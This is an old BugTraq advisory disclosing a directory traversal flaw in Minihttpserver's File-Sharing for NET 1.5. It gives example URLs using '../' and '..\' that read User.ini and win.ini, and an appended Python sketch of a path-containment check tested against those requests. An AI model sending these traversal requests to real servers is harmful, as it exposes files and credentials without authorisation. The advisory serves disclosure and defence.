BugTraq
Minihttpserver File-Sharing for NET Directory Traversal Vulnerability
Oct 03 2003 01:14PM
Bahaa Naamneh (b_naamneh hotmail com)
Minihttpserver File-Sharing for NET Directory Traversal Vulnerability
Affected Systems: File-Sharing for NET
version: 1.5 (and possibly earlier versions)
Vendor: Minihttpserver - http://www.minihttpserver.net
Issue: Directory Traversal Vulnerability
Released: 2 October 2003
Introduction:
=============
"File Sharing for net is a complete, secure web server that shares
your business documents and files over the web: remote users only
need browsers to view your files. Share, transfer files securely with
colleagues."
- Vendor's Description
[ http://www.minihttpserver.net ]
Details:
========
File-Sharing for NET has a Directory Traversal Vulnerability. Using
the string '../' or '..\' in a URL, an attacker can gain read access
to any file outside of the intended web-published file system
directory.
http://[target]/../../../existing_file
http://[target]\..\..\..\existing_file
Examples:
---------
http://127.0.0.1/../../../ Program Files/FileSharing for NET/User.ini
http://127.0.0.1/../../../windows/win.ini
Vendor status:
==============
The vendor has been informed, and they are fixing this bug.
The updated version, when released, can be downloaded from:
http://www.minihttpserver.net/fbbs.zip
Discovered by/Credit:
=====================
Bahaa Naamneh
b_naamneh (at) hotmail (dot) com
http://www.bsecurity.tk
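
A sketch of the containment check whose absence the advisory describes, added here as an example; it is not the vendor's code or fix. It maps a request path to a file under a hypothetical document root (`C:\share\public`), treats '/' and '\' as the same separator, and refuses any result that leaves the root. The function names and the root are assumptions, and decoding percent-encoding before validating goes beyond the two forms the advisory lists.

```python
import ntpath
from urllib.parse import unquote

DOCROOT = r"C:\share\public"  # hypothetical web-published directory (assumption)

def naive_map(url_path):
    """Flawed pattern: join the root and the request path with no containment check."""
    rel = unquote(url_path).lstrip("/\\")
    return ntpath.normpath(ntpath.join(DOCROOT, rel))

def safe_map(url_path, docroot=DOCROOT):
    """Return the file path under docroot, or None if the request must be refused."""
    decoded = unquote(url_path)          # decode first, then validate
    if "\x00" in decoded or ":" in decoded:
        return None                      # no NUL bytes, drive letters or streams
    # Treat '/' and '\' as the same separator and make the path relative.
    rel = decoded.replace("/", "\\").lstrip("\\")
    root = ntpath.normpath(docroot)
    full = ntpath.normpath(ntpath.join(root, rel))   # collapses '..' segments
    # Containment: compare whole path components, not string prefixes, so a
    # sibling directory whose name starts like the root's does not pass.
    common = ntpath.commonpath([root, full])
    if ntpath.normcase(common) != ntpath.normcase(root):
        return None
    return full

# Constructed sample requests: one legitimate, two in the forms the advisory lists.
SAMPLES = [
    "/docs/report.txt",
    "/../../../windows/win.ini",
    "\\..\\..\\..\\windows\\win.ini",
]

def compare(samples=SAMPLES):
    """Map each sample with both functions: {request: (naive, safe)}."""
    return {s: (naive_map(s), safe_map(s)) for s in samples}

if __name__ == "__main__":
    for request, (naive, safe) in compare().items():
        print(f"{request!r:40} naive={naive!r} safe={safe!r}")
```

`ntpath` applies Windows path rules on any platform, so the check can be exercised on a non-Windows machine as well.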